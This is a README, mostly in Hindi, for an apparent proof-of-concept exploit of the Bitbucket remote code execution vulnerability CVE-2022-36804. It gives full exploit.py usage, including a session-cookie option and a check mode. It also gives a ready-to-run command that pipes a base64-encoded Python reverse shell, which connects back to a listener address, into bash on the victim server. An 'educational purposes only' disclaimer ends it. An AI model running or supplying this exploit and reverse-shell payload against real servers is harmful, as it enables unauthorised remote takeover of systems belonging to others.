
BitBucket RCE CVE-2022-36804 के लिए एक वास्तविक एक्सप्लॉइट
इस रिपॉजिटरी में हाल की BitBucket रिमोट कोड निष्पादन भेद्यता (CVE-2022-36804) के लिए एक सरल प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट मौजूद है। इस भेद्यता का शोषण करने के लिए लक्ष्य इंस्टेंस पर एक रिपॉजिटरी तक पहुँच आवश्यक है, यदि आपके पास क्रेडेंशियल्स नहीं हैं, तो लक्ष्य में सार्वजनिक रिपॉजिटरीज़ होनी चाहिए।
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
[--check]
Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)
optional arguments:
-h, --help show this help message and exit
-p PROJECT, --project PROJECT
The name of the project the public repository resides in (E.g.
testproject)
-r REPO, --repo REPO The name of the public repository (E.g. testrepo)
-u URL, --url URL The URL of the BitBucket server (E.g. http://localhost:7990/)
-c COMMAND, --command COMMAND
The command to execute on the server (E.g. 'curl http://canary.domain/')
--proxy PROXY HTTP proxy to use for debugging (E.g. http://localhost:8080/)
--session SESSION The value of your 'BITBUCKETSESSIONID' cookie, required if your target
repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
--check Only perform a check to see if the instance is vulnerable
यह जाँचने के लिए कि कोई इंस्टेंस असुरक्षित है या नहीं, आप निम्न कमांड चला सकते हैं
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check
नीचे दिया गया कमांड पीड़ित पर रिवर्स शेल स्थापित करने के लिए इस्तेमाल किया जा सकता है (base64 पेलोड को आपके लिसनर विवरण के साथ अपडेट करना होगा)
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d | bash |"
यह एक्सप्लॉइट केवल शैक्षिक/शोध उद्देश्यों के लिए है, मैं इस बात के लिए ज़िम्मेदार नहीं हूँ कि लोग इसका उपयोग कैसे करेंगे। अच्छे रहें :)